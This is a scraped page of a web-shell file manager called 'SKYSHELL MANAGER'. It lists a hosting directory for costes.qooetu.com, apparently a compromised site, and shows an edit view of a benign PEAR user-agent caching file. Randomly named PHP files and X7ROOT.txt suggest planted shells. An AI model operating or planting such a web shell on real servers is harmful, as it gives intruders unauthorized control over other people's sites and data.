📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: APC.php
<?php /** * Net_UserAgent_Detect_APC.php * * PHP version 4.2 * * Copyright (c) 1997-2003 The PHP Group * * This source file is subject to version 2.0 of the PHP license, * that is bundled with this package in the file LICENSE, and is * available at through the world-wide-web at * http://www.php.net/license/2_02.txt. * If you did not receive a copy of the PHP license and are unable to * obtain it through the world-wide-web, please send a note to * license@php.net so we can mail you a copy immediately. * * @category Net * @package Net_UserAgent * @author Lucas Nealan <lucas@facebook.com> * @license http://www.php.net/license/2_02.txt PHP 2.0 Licence * @version CVS: $Id: APC.php 281797 2009-06-08 04:49:23Z clockwerx $ * @link http://pear.php.net/package/Net_UserAgent_Detect */ require_once 'Net/UserAgent/Detect.php'; /** * Net_UserAgent_Detect_APC * * PHP version 4.2 * * Copyright (c) 1997-2003 The PHP Group * * This source file is subject to version 2.0 of the PHP license, * that is bundled with this package in the file LICENSE, and is * available at through the world-wide-web at * http://www.php.net/license/2_02.txt. * If you did not receive a copy of the PHP license and are unable to * obtain it through the world-wide-web, please send a note to * license@php.net so we can mail you a copy immediately. * * @category Net * @package Net_UserAgent * @author Lucas Nealan <lucas@facebook.com> * @license http://www.php.net/license/2_02.txt PHP 2.0 Licence * @link http://pear.php.net/package/Net_UserAgent_Detect */ class Net_UserAgent_Detect_APC extends Net_UserAgent_Detect { var $key = ''; /** * Class constructor * * @param string $in_userAgent (optional) User agent override. * @param mixed $in_detect (optional) The level of checking to do. * @param mixed $ua_cache_window Unknown */ function Net_UserAgent_Detect_APC($in_userAgent = null, $in_detect = null, $ua_cache_window = 600) { $data = ''; $restored = false; // don't cache after time period $ua_cache_timeout = apc_fetch('useragent:cache_timeout'); if ($ua_cache_window > 0) { if (!$ua_cache_timeout) { // check apc uptime and disable after x mins $apc_data = apc_cache_info('file', true); if (isset($apc_data['start_time'])) { $uptime = $apc_data['start_time']; // timeout and disable after 10 minutes of uptime if (time() - $uptime > $ua_cache_window) { apc_store('useragent:cache_timeout', true); $ua_cache_timeout = true; // don't cache this one either } } } if (!$this->key) { $key_flags = ''; if ($in_detect !== null) { $key_flags = implode('-', $in_detect); } $this->key = 'useragent:'.md5($in_userAgent.$key_flags); } if ($data = apc_fetch($this->key)) { $success = null; $data = unserialize($data); if ($data) { $restored = $this->cacheRestore($data); } } } if (!$data) { $this->detect($in_userAgent, $in_detect); if ($ua_cache_window > 0 && !$ua_cache_timeout) { $this->cacheSave(); } } } /** * To be used in place of the contructor to return only open instance. * * @param string $in_userAgent (optional) User agent override. * @param mixed $in_detect (optional) The level of checking to do. * * @access public * @return object Net_UserAgent_Detect instance */ function &singleton($in_userAgent = null, $in_detect = null) { static $instance; if (!isset($instance)) { $instance = new Net_UserAgent_Detect_APC($in_userAgent, $in_detect); } return $instance; } /** * Restore cached items * * @param mixed[] $cache An array of items to restore * * @return bool */ function cacheRestore($cache) { if (is_array($cache)) { foreach ($cache as $prop => $value) { $ptr = Net_UserAgent_Detect::_getStaticProperty($prop); $ptr = $value; } return true; } return false; } /** * Store items in APC * * @return void */ function cacheSave() { if ($this->key) { $items = array('browser', 'features', 'leadingIdentifier', 'majorVersion', 'options', 'os', 'quirks', 'subVersion', 'userAgent', 'version'); $data = array(); foreach ($items as $item) { $data[$item] = Net_UserAgent_Detect::_getStaticProperty($item); } apc_store($this->key, serialize($data)); } } } ?>
Save